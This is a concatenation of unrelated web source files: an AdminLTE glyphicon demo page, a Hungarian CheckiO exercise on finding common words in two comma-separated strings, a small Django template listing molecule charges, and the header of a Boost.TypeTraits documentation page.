</li>
<li>
<span class="glyphicon glyphicon-align-left"></span>
<span class="glyphicon-class">glyphicon glyphicon-align-left</span>
</li>
<li>
<span class="glyphicon glyphicon-align-right"></span>
<span class="glyphicon-class">glyphicon glyphicon-align-right</span>
</li>
<li>
<span class="glyphicon glyphicon-arrow-down"></span>
<span class="glyphicon-class">glyphicon glyphicon-arrow-down</span>
</li>
<li>
<span class="glyphicon glyphicon-arrow-left"></span>
<span class="glyphicon-class">glyphicon glyphicon-arrow-left</span>
</li>
<li>
<span class="glyphicon glyphicon-arrow-right"></span>
<span class="glyphicon-class">glyphicon glyphicon-arrow-right</span>
</li>
<li>
<span class="glyphicon glyphicon-arrow-up"></span>
<span class="glyphicon-class">glyphicon glyphicon-arrow-up</span>
</li>
<li>
<span class="glyphicon glyphicon-asterisk"></span>
<span class="glyphicon-class">glyphicon glyphicon-asterisk</span>
</li>
<li>
<span class="glyphicon glyphicon-backward"></span>
<span class="glyphicon-class">glyphicon glyphicon-backward</span>
</li>
<li>
<span class="glyphicon glyphicon-ban-circle"></span>
<span class="glyphicon-class">glyphicon glyphicon-ban-circle</span>
</li>
<li>
<span class="glyphicon glyphicon-barcode"></span>
<span class="glyphicon-class">glyphicon glyphicon-barcode</span>
</li>
<li>
<span class="glyphicon glyphicon-bell"></span>
<span class="glyphicon-class">glyphicon glyphicon-bell</span>
</li>
<li>
<span class="glyphicon glyphicon-bold"></span>
<span class="glyphicon-class">glyphicon glyphicon-bold</span>
</li>
<li>
<span class="glyphicon glyphicon-book"></span>
<span class="glyphicon-class">glyphicon glyphicon-book</span>
</li>
<li>
<span class="glyphicon glyphicon-bookmark"></span>
<span class="glyphicon-class">glyphicon glyphicon-bookmark</span>
</li>
<li>
<span class="glyphicon glyphicon-briefcase"></span>
<span class="glyphicon-class">glyphicon glyphicon-briefcase</span>
</li>
<li>
<span class="glyphicon glyphicon-bullhorn"></span>
<span class="glyphicon-class">glyphicon glyphicon-bullhorn</span>
</li>
<li>
<span class="glyphicon glyphicon-calendar"></span>
<span class="glyphicon-class">glyphicon glyphicon-calendar</span>
</li>
<li>
<span class="glyphicon glyphicon-camera"></span>
<span class="glyphicon-class">glyphicon glyphicon-camera</span>
</li>
<li>
<span class="glyphicon glyphicon-certificate"></span>
<span class="glyphicon-class">glyphicon glyphicon-certificate</span>
</li>
<li>
<span class="glyphicon glyphicon-check"></span>
<span class="glyphicon-class">glyphicon glyphicon-check</span>
</li>
<li>
<span class="glyphicon glyphicon-chevron-down"></span>
<span class="glyphicon-class">glyphicon glyphicon-chevron-down</span>
</li>
<li>
<span class="glyphicon glyphicon-chevron-left"></span>
<span class="glyphicon-class">glyphicon glyphicon-chevron-left</span>
</li>
<li>
<span class="glyphicon glyphicon-chevron-right"></span>
<span class="glyphicon-class">glyphicon glyphicon-chevron-right</span>
</li>
<li>
<span class="glyphicon glyphicon-chevron-up"></span>
<span class="glyphicon-class">glyphicon glyphicon-chevron-up</span>
</li>
<li>
<span class="glyphicon glyphicon-circle-arrow-down"></span>
<span class="glyphicon-class">glyphicon glyphicon-circle-arrow-down</span>
</li>
<li>
<span class="glyphicon glyphicon-circle-arrow-left"></span>
<span class="glyphicon-class">glyphicon glyphicon-circle-arrow-left</span>
</li>
<li>
<span class="glyphicon glyphicon-circle-arrow-right"></span>
<span class="glyphicon-class">glyphicon glyphicon-circle-arrow-right</span>
</li>
<li>
<span class="glyphicon glyphicon-circle-arrow-up"></span>
<span class="glyphicon-class">glyphicon glyphicon-circle-arrow-up</span>
</li>
<li>
<span class="glyphicon glyphicon-cloud"></span>
<span class="glyphicon-class">glyphicon glyphicon-cloud</span>
</li>
<li>
<span class="glyphicon glyphicon-cloud-download"></span>
<span class="glyphicon-class">glyphicon glyphicon-cloud-download</span>
</li>
<li>
<span class="glyphicon glyphicon-cloud-upload"></span>
<span class="glyphicon-class">glyphicon glyphicon-cloud-upload</span>
</li>
<li>
<span class="glyphicon glyphicon-cog"></span>
<span class="glyphicon-class">glyphicon glyphicon-cog</span>
</li>
<li>
<span class="glyphicon glyphicon-collapse-down"></span>
<span class="glyphicon-class">glyphicon glyphicon-collapse-down</span>
</li>
<li>
<span class="glyphicon glyphicon-collapse-up"></span>
<span class="glyphicon-class">glyphicon glyphicon-collapse-up</span>
</li>
<li>
<span class="glyphicon glyphicon-comment"></span>
<span class="glyphicon-class">glyphicon glyphicon-comment</span>
</li>
<li>
<span class="glyphicon glyphicon-compressed"></span>
<span class="glyphicon-class">glyphicon glyphicon-compressed</span>
</li>
<li>
<span class="glyphicon glyphicon-copyright-mark"></span>
<span class="glyphicon-class">glyphicon glyphicon-copyright-mark</span>
</li>
<li>
<span class="glyphicon glyphicon-credit-card"></span>
<span class="glyphicon-class">glyphicon glyphicon-credit-card</span>
</li>
<li>
<span class="glyphicon glyphicon-cutlery"></span>
<span class="glyphicon-class">glyphicon glyphicon-cutlery</span>
</li>
<li>
<span class="glyphicon glyphicon-dashboard"></span>
<span class="glyphicon-class">glyphicon glyphicon-dashboard</span>
</li>
<li>
<span class="glyphicon glyphicon-download"></span>
<span class="glyphicon-class">glyphicon glyphicon-download</span>
</li>
<li>
<span class="glyphicon glyphicon-download-alt"></span>
<span class="glyphicon-class">glyphicon glyphicon-download-alt</span>
</li>
<li>
<span class="glyphicon glyphicon-earphone"></span>
<span class="glyphicon-class">glyphicon glyphicon-earphone</span>
</li>
<li>
<span class="glyphicon glyphicon-edit"></span>
<span class="glyphicon-class">glyphicon glyphicon-edit</span>
</li>
<li>
<span class="glyphicon glyphicon-eject"></span>
<span class="glyphicon-class">glyphicon glyphicon-eject</span>
</li>
<li>
<span class="glyphicon glyphicon-envelope"></span>
<span class="glyphicon-class">glyphicon glyphicon-envelope</span>
</li>
<li>
<span class="glyphicon glyphicon-euro"></span>
<span class="glyphicon-class">glyphicon glyphicon-euro</span>
</li>
<li>
<span class="glyphicon glyphicon-exclamation-sign"></span>
<span class="glyphicon-class">glyphicon glyphicon-exclamation-sign</span>
</li>
<li>
<span class="glyphicon glyphicon-expand"></span>
<span class="glyphicon-class">glyphicon glyphicon-expand</span>
</li>
<li>
<span class="glyphicon glyphicon-export"></span>
<span class="glyphicon-class">glyphicon glyphicon-export</span>
</li>
<li>
<span class="glyphicon glyphicon-eye-close"></span>
<span class="glyphicon-class">glyphicon glyphicon-eye-close</span>
</li>
<li>
<span class="glyphicon glyphicon-eye-open"></span>
<span class="glyphicon-class">glyphicon glyphicon-eye-open</span>
</li>
<li>
<span class="glyphicon glyphicon-facetime-video"></span>
<span class="glyphicon-class">glyphicon glyphicon-facetime-video</span>
</li>
<li>
<span class="glyphicon glyphicon-fast-backward"></span>
<span class="glyphicon-class">glyphicon glyphicon-fast-backward</span>
</li>
<li>
<span class="glyphicon glyphicon-fast-forward"></span>
<span class="glyphicon-class">glyphicon glyphicon-fast-forward</span>
</li>
<li>
<span class="glyphicon glyphicon-file"></span>
<span class="glyphicon-class">glyphicon glyphicon-file</span>
</li>
<li>
<span class="glyphicon glyphicon-film"></span>
<span class="glyphicon-class">glyphicon glyphicon-film</span>
</li>
<li>
<span class="glyphicon glyphicon-filter"></span>
<span class="glyphicon-class">glyphicon glyphicon-filter</span>
</li>
<li>
<span class="glyphicon glyphicon-fire"></span>
<span class="glyphicon-class">glyphicon glyphicon-fire</span>
</li>
<li>
<span class="glyphicon glyphicon-flag"></span>
<span class="glyphicon-class">glyphicon glyphicon-flag</span>
</li>
<li>
<span class="glyphicon glyphicon-flash"></span>
<span class="glyphicon-class">glyphicon glyphicon-flash</span>
</li>
<li>
<span class="glyphicon glyphicon-floppy-disk"></span>
<span class="glyphicon-class">glyphicon glyphicon-floppy-disk</span>
</li>
<li>
<span class="glyphicon glyphicon-floppy-open"></span>
<span class="glyphicon-class">glyphicon glyphicon-floppy-open</span>
</li>
<li>
<span class="glyphicon glyphicon-floppy-remove"></span>
<span class="glyphicon-class">glyphicon glyphicon-floppy-remove</span>
</li>
<li>
<span class="glyphicon glyphicon-floppy-save"></span>
<span class="glyphicon-class">glyphicon glyphicon-floppy-save</span>
</li>
<li>
<span class="glyphicon glyphicon-floppy-saved"></span>
<span class="glyphicon-class">glyphicon glyphicon-floppy-saved</span>
</li>
<li>
<span class="glyphicon glyphicon-folder-close"></span>
<span class="glyphicon-class">glyphicon glyphicon-folder-close</span>
</li>
<li>
<span class="glyphicon glyphicon-folder-open"></span>
<span class="glyphicon-class">glyphicon glyphicon-folder-open</span>
</li>
<li>
<span class="glyphicon glyphicon-font"></span>
<span class="glyphicon-class">glyphicon glyphicon-font</span>
</li>
<li>
<span class="glyphicon glyphicon-forward"></span>
<span class="glyphicon-class">glyphicon glyphicon-forward</span>
</li>
<li>
<span class="glyphicon glyphicon-fullscreen"></span>
<span class="glyphicon-class">glyphicon glyphicon-fullscreen</span>
</li>
<li>
<span class="glyphicon glyphicon-gbp"></span>
<span class="glyphicon-class">glyphicon glyphicon-gbp</span>
</li>
<li>
<span class="glyphicon glyphicon-gift"></span>
<span class="glyphicon-class">glyphicon glyphicon-gift</span>
</li>
<li>
<span class="glyphicon glyphicon-glass"></span>
<span class="glyphicon-class">glyphicon glyphicon-glass</span>
</li>
<li>
<span class="glyphicon glyphicon-globe"></span>
<span class="glyphicon-class">glyphicon glyphicon-globe</span>
</li>
<li>
<span class="glyphicon glyphicon-hand-down"></span>
<span class="glyphicon-class">glyphicon glyphicon-hand-down</span>
</li>
<li>
<span class="glyphicon glyphicon-hand-left"></span>
<span class="glyphicon-class">glyphicon glyphicon-hand-left</span>
</li>
<li>
<span class="glyphicon glyphicon-hand-right"></span>
<span class="glyphicon-class">glyphicon glyphicon-hand-right</span>
</li>
<li>
<span class="glyphicon glyphicon-hand-up"></span>
<span class="glyphicon-class">glyphicon glyphicon-hand-up</span>
</li>
<li>
<span class="glyphicon glyphicon-hd-video"></span>
<span class="glyphicon-class">glyphicon glyphicon-hd-video</span>
</li>
<li>
<span class="glyphicon glyphicon-hdd"></span>
<span class="glyphicon-class">glyphicon glyphicon-hdd</span>
</li>
<li>
<span class="glyphicon glyphicon-header"></span>
<span class="glyphicon-class">glyphicon glyphicon-header</span>
</li>
<li>
<span class="glyphicon glyphicon-headphones"></span>
<span class="glyphicon-class">glyphicon glyphicon-headphones</span>
</li>
<li>
<span class="glyphicon glyphicon-heart"></span>
<span class="glyphicon-class">glyphicon glyphicon-heart</span>
</li>
<li>
<span class="glyphicon glyphicon-heart-empty"></span>
<span class="glyphicon-class">glyphicon glyphicon-heart-empty</span>
</li>
<li>
<span class="glyphicon glyphicon-home"></span>
<span class="glyphicon-class">glyphicon glyphicon-home</span>
</li>
<li>
<span class="glyphicon glyphicon-import"></span>
<span class="glyphicon-class">glyphicon glyphicon-import</span>
</li>
<li>
<span class="glyphicon glyphicon-inbox"></span>
<span class="glyphicon-class">glyphicon glyphicon-inbox</span>
</li>
<li>
<span class="glyphicon glyphicon-indent-left"></span>
<span class="glyphicon-class">glyphicon glyphicon-indent-left</span>
</li>
<li>
<span class="glyphicon glyphicon-indent-right"></span>
<span class="glyphicon-class">glyphicon glyphicon-indent-right</span>
</li>
<li>
<span class="glyphicon glyphicon-info-sign"></span>
<span class="glyphicon-class">glyphicon glyphicon-info-sign</span>
</li>
<li>
<span class="glyphicon glyphicon-italic"></span>
<span class="glyphicon-class">glyphicon glyphicon-italic</span>
</li>
<li>
<span class="glyphicon glyphicon-leaf"></span>
<span class="glyphicon-class">glyphicon glyphicon-leaf</span>
</li>
<li>
<span class="glyphicon glyphicon-link"></span>
<span class="glyphicon-class">glyphicon glyphicon-link</span>
</li>
<li>
<span class="glyphicon glyphicon-list"></span>
<span class="glyphicon-class">glyphicon glyphicon-list</span>
</li>
<li>
<span class="glyphicon glyphicon-list-alt"></span>
<span class="glyphicon-class">glyphicon glyphicon-list-alt</span>
</li>
<li>
<span class="glyphicon glyphicon-lock"></span>
<span class="glyphicon-class">glyphicon glyphicon-lock</span>
</li>
<li>
<span class="glyphicon glyphicon-log-in"></span>
<span class="glyphicon-class">glyphicon glyphicon-log-in</span>
</li>
<li>
<span class="glyphicon glyphicon-log-out"></span>
<span class="glyphicon-class">glyphicon glyphicon-log-out</span>
</li>
<li>
<span class="glyphicon glyphicon-magnet"></span>
<span class="glyphicon-class">glyphicon glyphicon-magnet</span>
</li>
<li>
<span class="glyphicon glyphicon-map-marker"></span>
<span class="glyphicon-class">glyphicon glyphicon-map-marker</span>
</li>
<li>
<span class="glyphicon glyphicon-minus"></span>
<span class="glyphicon-class">glyphicon glyphicon-minus</span>
</li>
<li>
<span class="glyphicon glyphicon-minus-sign"></span>
<span class="glyphicon-class">glyphicon glyphicon-minus-sign</span>
</li>
<li>
<span class="glyphicon glyphicon-move"></span>
<span class="glyphicon-class">glyphicon glyphicon-move</span>
</li>
<li>
<span class="glyphicon glyphicon-music"></span>
<span class="glyphicon-class">glyphicon glyphicon-music</span>
</li>
<li>
<span class="glyphicon glyphicon-new-window"></span>
<span class="glyphicon-class">glyphicon glyphicon-new-window</span>
</li>
<li>
<span class="glyphicon glyphicon-off"></span>
<span class="glyphicon-class">glyphicon glyphicon-off</span>
</li>
<li>
<span class="glyphicon glyphicon-ok"></span>
<span class="glyphicon-class">glyphicon glyphicon-ok</span>
</li>
<li>
<span class="glyphicon glyphicon-ok-circle"></span>
<span class="glyphicon-class">glyphicon glyphicon-ok-circle</span>
</li>
<li>
<span class="glyphicon glyphicon-ok-sign"></span>
<span class="glyphicon-class">glyphicon glyphicon-ok-sign</span>
</li>
<li>
<span class="glyphicon glyphicon-open"></span>
<span class="glyphicon-class">glyphicon glyphicon-open</span>
</li>
<li>
<span class="glyphicon glyphicon-paperclip"></span>
<span class="glyphicon-class">glyphicon glyphicon-paperclip</span>
</li>
<li>
<span class="glyphicon glyphicon-pause"></span>
<span class="glyphicon-class">glyphicon glyphicon-pause</span>
</li>
<li>
<span class="glyphicon glyphicon-pencil"></span>
<span class="glyphicon-class">glyphicon glyphicon-pencil</span>
</li>
<li>
<span class="glyphicon glyphicon-phone"></span>
<span class="glyphicon-class">glyphicon glyphicon-phone</span>
</li>
<li>
<span class="glyphicon glyphicon-phone-alt"></span>
<span class="glyphicon-class">glyphicon glyphicon-phone-alt</span>
</li>
<li>
<span class="glyphicon glyphicon-picture"></span>
<span class="glyphicon-class">glyphicon glyphicon-picture</span>
</li>
<li>
<span class="glyphicon glyphicon-plane"></span>
<span class="glyphicon-class">glyphicon glyphicon-plane</span>
</li>
<li>
<span class="glyphicon glyphicon-play"></span>
<span class="glyphicon-class">glyphicon glyphicon-play</span>
</li>
<li>
<span class="glyphicon glyphicon-play-circle"></span>
<span class="glyphicon-class">glyphicon glyphicon-play-circle</span>
</li>
<li>
<span class="glyphicon glyphicon-plus"></span>
<span class="glyphicon-class">glyphicon glyphicon-plus</span>
</li>
<li>
<span class="glyphicon glyphicon-plus-sign"></span>
<span class="glyphicon-class">glyphicon glyphicon-plus-sign</span>
</li>
<li>
<span class="glyphicon glyphicon-print"></span>
<span class="glyphicon-class">glyphicon glyphicon-print</span>
</li>
<li>
<span class="glyphicon glyphicon-pushpin"></span>
<span class="glyphicon-class">glyphicon glyphicon-pushpin</span>
</li>
<li>
<span class="glyphicon glyphicon-qrcode"></span>
<span class="glyphicon-class">glyphicon glyphicon-qrcode</span>
</li>
<li>
<span class="glyphicon glyphicon-question-sign"></span>
<span class="glyphicon-class">glyphicon glyphicon-question-sign</span>
</li>
<li>
<span class="glyphicon glyphicon-random"></span>
<span class="glyphicon-class">glyphicon glyphicon-random</span>
</li>
<li>
<span class="glyphicon glyphicon-record"></span>
<span class="glyphicon-class">glyphicon glyphicon-record</span>
</li>
<li>
<span class="glyphicon glyphicon-refresh"></span>
<span class="glyphicon-class">glyphicon glyphicon-refresh</span>
</li>
<li>
<span class="glyphicon glyphicon-registration-mark"></span>
<span class="glyphicon-class">glyphicon glyphicon-registration-mark</span>
</li>
<li>
<span class="glyphicon glyphicon-remove"></span>
<span class="glyphicon-class">glyphicon glyphicon-remove</span>
</li>
<li>
<span class="glyphicon glyphicon-remove-circle"></span>
<span class="glyphicon-class">glyphicon glyphicon-remove-circle</span>
</li>
<li>
<span class="glyphicon glyphicon-remove-sign"></span>
<span class="glyphicon-class">glyphicon glyphicon-remove-sign</span>
</li>
<li>
<span class="glyphicon glyphicon-repeat"></span>
<span class="glyphicon-class">glyphicon glyphicon-repeat</span>
</li>
<li>
<span class="glyphicon glyphicon-resize-full"></span>
<span class="glyphicon-class">glyphicon glyphicon-resize-full</span>
</li>
<li>
<span class="glyphicon glyphicon-resize-horizontal"></span>
<span class="glyphicon-class">glyphicon glyphicon-resize-horizontal</span>
</li>
<li>
<span class="glyphicon glyphicon-resize-small"></span>
<span class="glyphicon-class">glyphicon glyphicon-resize-small</span>
</li>
<li>
<span class="glyphicon glyphicon-resize-vertical"></span>
<span class="glyphicon-class">glyphicon glyphicon-resize-vertical</span>
</li>
<li>
<span class="glyphicon glyphicon-retweet"></span>
<span class="glyphicon-class">glyphicon glyphicon-retweet</span>
</li>
<li>
<span class="glyphicon glyphicon-road"></span>
<span class="glyphicon-class">glyphicon glyphicon-road</span>
</li>
<li>
<span class="glyphicon glyphicon-save"></span>
<span class="glyphicon-class">glyphicon glyphicon-save</span>
</li>
<li>
<span class="glyphicon glyphicon-saved"></span>
<span class="glyphicon-class">glyphicon glyphicon-saved</span>
</li>
<li>
<span class="glyphicon glyphicon-screenshot"></span>
<span class="glyphicon-class">glyphicon glyphicon-screenshot</span>
</li>
<li>
<span class="glyphicon glyphicon-sd-video"></span>
<span class="glyphicon-class">glyphicon glyphicon-sd-video</span>
</li>
<li>
<span class="glyphicon glyphicon-search"></span>
<span class="glyphicon-class">glyphicon glyphicon-search</span>
</li>
<li>
<span class="glyphicon glyphicon-send"></span>
<span class="glyphicon-class">glyphicon glyphicon-send</span>
</li>
<li>
<span class="glyphicon glyphicon-share"></span>
<span class="glyphicon-class">glyphicon glyphicon-share</span>
</li>
<li>
<span class="glyphicon glyphicon-share-alt"></span>
<span class="glyphicon-class">glyphicon glyphicon-share-alt</span>
</li>
<li>
<span class="glyphicon glyphicon-shopping-cart"></span>
<span class="glyphicon-class">glyphicon glyphicon-shopping-cart</span>
</li>
<li>
<span class="glyphicon glyphicon-signal"></span>
<span class="glyphicon-class">glyphicon glyphicon-signal</span>
</li>
<li>
<span class="glyphicon glyphicon-sort"></span>
<span class="glyphicon-class">glyphicon glyphicon-sort</span>
</li>
<li>
<span class="glyphicon glyphicon-sort-by-alphabet"></span>
<span class="glyphicon-class">glyphicon glyphicon-sort-by-alphabet</span>
</li>
<li>
<span class="glyphicon glyphicon-sort-by-alphabet-alt"></span>
<span class="glyphicon-class">glyphicon glyphicon-sort-by-alphabet-alt</span>
</li>
<li>
<span class="glyphicon glyphicon-sort-by-attributes"></span>
<span class="glyphicon-class">glyphicon glyphicon-sort-by-attributes</span>
</li>
<li>
<span class="glyphicon glyphicon-sort-by-attributes-alt"></span>
<span class="glyphicon-class">glyphicon glyphicon-sort-by-attributes-alt</span>
</li>
<li>
<span class="glyphicon glyphicon-sort-by-order"></span>
<span class="glyphicon-class">glyphicon glyphicon-sort-by-order</span>
</li>
<li>
<span class="glyphicon glyphicon-sort-by-order-alt"></span>
<span class="glyphicon-class">glyphicon glyphicon-sort-by-order-alt</span>
</li>
<li>
<span class="glyphicon glyphicon-sound-5-1"></span>
<span class="glyphicon-class">glyphicon glyphicon-sound-5-1</span>
</li>
<li>
<span class="glyphicon glyphicon-sound-6-1"></span>
<span class="glyphicon-class">glyphicon glyphicon-sound-6-1</span>
</li>
<li>
<span class="glyphicon glyphicon-sound-7-1"></span>
<span class="glyphicon-class">glyphicon glyphicon-sound-7-1</span>
</li>
<li>
<span class="glyphicon glyphicon-sound-dolby"></span>
<span class="glyphicon-class">glyphicon glyphicon-sound-dolby</span>
</li>
<li>
<span class="glyphicon glyphicon-sound-stereo"></span>
<span class="glyphicon-class">glyphicon glyphicon-sound-stereo</span>
</li>
<li>
<span class="glyphicon glyphicon-star"></span>
<span class="glyphicon-class">glyphicon glyphicon-star</span>
</li>
<li>
<span class="glyphicon glyphicon-star-empty"></span>
<span class="glyphicon-class">glyphicon glyphicon-star-empty</span>
</li>
<li>
<span class="glyphicon glyphicon-stats"></span>
<span class="glyphicon-class">glyphicon glyphicon-stats</span>
</li>
<li>
<span class="glyphicon glyphicon-step-backward"></span>
<span class="glyphicon-class">glyphicon glyphicon-step-backward</span>
</li>
<li>
<span class="glyphicon glyphicon-step-forward"></span>
<span class="glyphicon-class">glyphicon glyphicon-step-forward</span>
</li>
<li>
<span class="glyphicon glyphicon-stop"></span>
<span class="glyphicon-class">glyphicon glyphicon-stop</span>
</li>
<li>
<span class="glyphicon glyphicon-subtitles"></span>
<span class="glyphicon-class">glyphicon glyphicon-subtitles</span>
</li>
<li>
<span class="glyphicon glyphicon-tag"></span>
<span class="glyphicon-class">glyphicon glyphicon-tag</span>
</li>
<li>
<span class="glyphicon glyphicon-tags"></span>
<span class="glyphicon-class">glyphicon glyphicon-tags</span>
</li>
<li>
<span class="glyphicon glyphicon-tasks"></span>
<span class="glyphicon-class">glyphicon glyphicon-tasks</span>
</li>
<li>
<span class="glyphicon glyphicon-text-height"></span>
<span class="glyphicon-class">glyphicon glyphicon-text-height</span>
</li>
<li>
<span class="glyphicon glyphicon-text-width"></span>
<span class="glyphicon-class">glyphicon glyphicon-text-width</span>
</li>
<li>
<span class="glyphicon glyphicon-th"></span>
<span class="glyphicon-class">glyphicon glyphicon-th</span>
</li>
<li>
<span class="glyphicon glyphicon-th-large"></span>
<span class="glyphicon-class">glyphicon glyphicon-th-large</span>
</li>
<li>
<span class="glyphicon glyphicon-th-list"></span>
<span class="glyphicon-class">glyphicon glyphicon-th-list</span>
</li>
<li>
<span class="glyphicon glyphicon-thumbs-down"></span>
<span class="glyphicon-class">glyphicon glyphicon-thumbs-down</span>
</li>
<li>
<span class="glyphicon glyphicon-thumbs-up"></span>
<span class="glyphicon-class">glyphicon glyphicon-thumbs-up</span>
</li>
<li>
<span class="glyphicon glyphicon-time"></span>
<span class="glyphicon-class">glyphicon glyphicon-time</span>
</li>
<li>
<span class="glyphicon glyphicon-tint"></span>
<span class="glyphicon-class">glyphicon glyphicon-tint</span>
</li>
<li>
<span class="glyphicon glyphicon-tower"></span>
<span class="glyphicon-class">glyphicon glyphicon-tower</span>
</li>
<li>
<span class="glyphicon glyphicon-transfer"></span>
<span class="glyphicon-class">glyphicon glyphicon-transfer</span>
</li>
<li>
<span class="glyphicon glyphicon-trash"></span>
<span class="glyphicon-class">glyphicon glyphicon-trash</span>
</li>
<li>
<span class="glyphicon glyphicon-tree-conifer"></span>
<span class="glyphicon-class">glyphicon glyphicon-tree-conifer</span>
</li>
<li>
<span class="glyphicon glyphicon-tree-deciduous"></span>
<span class="glyphicon-class">glyphicon glyphicon-tree-deciduous</span>
</li>
<li>
<span class="glyphicon glyphicon-unchecked"></span>
<span class="glyphicon-class">glyphicon glyphicon-unchecked</span>
</li>
<li>
<span class="glyphicon glyphicon-upload"></span>
<span class="glyphicon-class">glyphicon glyphicon-upload</span>
</li>
<li>
<span class="glyphicon glyphicon-usd"></span>
<span class="glyphicon-class">glyphicon glyphicon-usd</span>
</li>
<li>
<span class="glyphicon glyphicon-user"></span>
<span class="glyphicon-class">glyphicon glyphicon-user</span>
</li>
<li>
<span class="glyphicon glyphicon-volume-down"></span>
<span class="glyphicon-class">glyphicon glyphicon-volume-down</span>
</li>
<li>
<span class="glyphicon glyphicon-volume-off"></span>
<span class="glyphicon-class">glyphicon glyphicon-volume-off</span>
</li>
<li>
<span class="glyphicon glyphicon-volume-up"></span>
<span class="glyphicon-class">glyphicon glyphicon-volume-up</span>
</li>
<li>
<span class="glyphicon glyphicon-warning-sign"></span>
<span class="glyphicon-class">glyphicon glyphicon-warning-sign</span>
</li>
<li>
<span class="glyphicon glyphicon-wrench"></span>
<span class="glyphicon-class">glyphicon glyphicon-wrench</span>
</li>
<li>
<span class="glyphicon glyphicon-zoom-in"></span>
<span class="glyphicon-class">glyphicon glyphicon-zoom-in</span>
</li>
<li>
<span class="glyphicon glyphicon-zoom-out"></span>
<span class="glyphicon-class">glyphicon glyphicon-zoom-out</span>
</li>
</ul>
</div><!-- /#ion-icons -->
</div><!-- /.tab-content -->
</div><!-- /.nav-tabs-custom -->
</div><!-- /.col -->
</div><!-- /.row -->
</section><!-- /.content -->
</aside><!-- /.right-side -->
</div><!-- ./wrapper -->
<script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js" type="text/javascript"></script>
<!-- AdminLTE App -->
<script src="../../js/AdminLTE/app.js" type="text/javascript"></script>
<!-- AdminLTE for demo purposes -->
<script src="../../js/AdminLTE/demo.js" type="text/javascript"></script>
</body>
</html>
|
_old/translations/hu/info/task_description.html
|
Empire-of-Code-Puzzles/checkio-empire-common-words
|
<img class="for_info_only" title="mirror" src="{{MEDIA}}mirror.png" alt="mirror"
style="width: 300px;float: left; margin-top: 10px; "/>
<p>
Folytassuk a szavak tanulmányozását! Adott két karakterlánc,
amelyek veszővel elválasztott szavakat tartalmaznak. Próbálja
meghatározni, hogy mi a közös ezekben a karakterláncokban! A szavak
egyik karakterláncban sem ismétlődnek.
</p>
<p>
Az Ön függvényének meg kell határoznia azokat a szavakat, amelyek minkét
karakterláncban megtalálhatók. Az eredménynek is egy karakterláncnak kell
lennie, amely vesszőkkel elválasztott szavakból áll és
<strong>ábécérendbe</strong> van rendezve.
</p>
<p>
<strong>Megjegyzés: </strong> Könnyen meg lehet oldani ezt a feladatot a következő
függvények segítségével:
{% if "python 2" in interpreter|lower %}
<a href="http://docs.python.org/2/library/stdtypes.html#str.split">str.split</a>,
<a href="http://docs.python.org/2/library/stdtypes.html#str.join">str.join</a> és
<a href="http://docs.python.org/2/library/functions.html#sorted">sorted</a>.
Továbbá tanulmányozza át a halmaz
<a href="http://docs.python.org/2/library/stdtypes.html#set">set</a> adattípust.
{% else %}
<a href="http://docs.python.org/3/library/stdtypes.html#str.split">str.split</a>,
<a href="http://docs.python.org/3/library/stdtypes.html#str.join">str.join</a> és
<a href="http://docs.python.org/3/library/functions.html#sorted">sorted</a> adattípust.
Továbbá tanulmányozza át a halmaz
<a href="http://docs.python.org/3/library/stdtypes.html#set">set</a>.
{% endif %}
</p>
<p>
<strong>Bemeneti adatok: </strong> két argumentum szövegként (str).
</p>
<p>
<strong>Kimeneti adatok: </strong> mindkét karakterláncban megtalálható szavak
felsorolása szövegként (str).
</p>
<div class="for_info_only">
<p>
<strong>Példák:</strong>
</p>
<pre class="brush: python">
checkio("hello,world", "hello,earth") == "hello"
checkio("one,two,three", "four,five,six") == ""
checkio("one,two,three", "four,five,one,two,six,three") == "one,three,two"
</pre>
</div>
<p class="for_info_only">
<strong>Alkalmazása: </strong>
Ennek a feladatnak a segítségével gyakorolni lehet a halmaz és szöveges
adattípusok használatát. Ezek a készségek hasznosak lesznek a nyelvi elemzés során.
</p>
<p>
<strong>Előfeltételek: </strong><br>
Mindkét megadott karakterlánc nem tartalmazhat 10 szónál többet.<br>
Minden egyes szó vesszővel van elválasztva a másiktól.<br>
Minden szó csak kisbetűs latin betűkből áll.
</p>
<div class="facts for_info_only">
<p>
A CheckiO világában Ön új szigeteket fedezhet fel, feladatokat oldhat meg,
és a megoldásokért szerzett pontokat újabb sziketek felfedésére használhatja fel.
Több mint 100 feladat megoldása vár még Önre!
</p>
</div>
|
q/templates/q/results.html
|
maxivanoff/fftoolbox-app
|
{% extends 'base.html' %}
{% load staticfiles %}
{% block body_block %}
<h3>{{ molecule.name }} charges:</h3>
{% for pc in charges %}
<li>{{pc.name}}: {{pc.value}}</li>
{% endfor %}
</li><a href="{% url 'q:download_charges' molecule.filename %}">Download mol2 file</a></li>
{% endblock %}
|
boost/libs/type_traits/doc/html/boost_typetraits/category/value_traits/properties.html
|
geodynamics/gale
|
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>General Type Properties</title>
<link rel="stylesheet" href="../../../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.74.0">
<link rel="home" href="../../../index.html" title="Chapter 1. Boost.TypeTraits">
<link rel="up" href="../value_traits.html" title="Type Traits that Describe the Properties of a Type">
<link rel="prev" href="primary.html" title="Categorizing a Type">
<link rel="next" href="relate.html" title="Relationships Between Two Types">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../../boost.png"></td>
<td align="center"><a href="../../../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="primary.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../value_traits.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="relate.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="section" lang="en">
<div class="titlepage"><div><div><h4 class="title">
<a name="boost_typetraits.category.value_traits.properties"></a><a class="link" href="properties.html" title="General Type Properties">General
Type Properties</a>
